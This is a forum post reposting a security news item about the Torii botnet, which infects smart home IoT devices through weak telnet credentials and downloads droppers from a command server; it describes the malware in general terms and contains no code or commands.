- This topic has 0 replies, 1 voice, and was last updated 5 years, 6 months ago by
.
-
Posts
-
-
#News(Security) [ via IoTForIndiaGroup ]
Torii botnet targets smart home IoT devices.
The botnet can communicate securely and stealthily, as well as execute different commands sent by the malware author.A new IoT botnet named ‘Torii’ was found targeting smart home devices. Security researchers consider it to be the “most sophisticated botnet” they’ve ever seen. This is primarily due to Torii using six different methods for persistence. The botnet also uses a different script from other typical IoT malware in the wild.
The malware author(s) appears to have designed Torii to be stealthy and persistent. Torii’s operator(s) also created binaries for multiple architectures, to execute its advanced features. Communication with the command and control (C2) servers is encrypted and other advanced functions of the malware include exfiltration and command execution.
otted the ‘Torii’ botnet strain in his Telnet honeypot, and published a detailed report on the botnet.Malware infection vector
Torii begins by launching a telnet attack and infects weak credentials of targeted devices, following which the botnet executes an initial shell script. Then, the botnet attempts to discover the architecture of the targeted device and downloads an appropriate payload for the device.After determining the architecture, the botnet downloads and executes the appropriate binary (dropper) from the C2 server. These droppers are always binary files, in ELF format, and prepare for the second stage of the attack. Once the ELF and executable files are installed, the dropper makes sure that it remains persistent.
However, this persistence is achieved using at least six methods
-
- You must be logged in to reply to this topic.
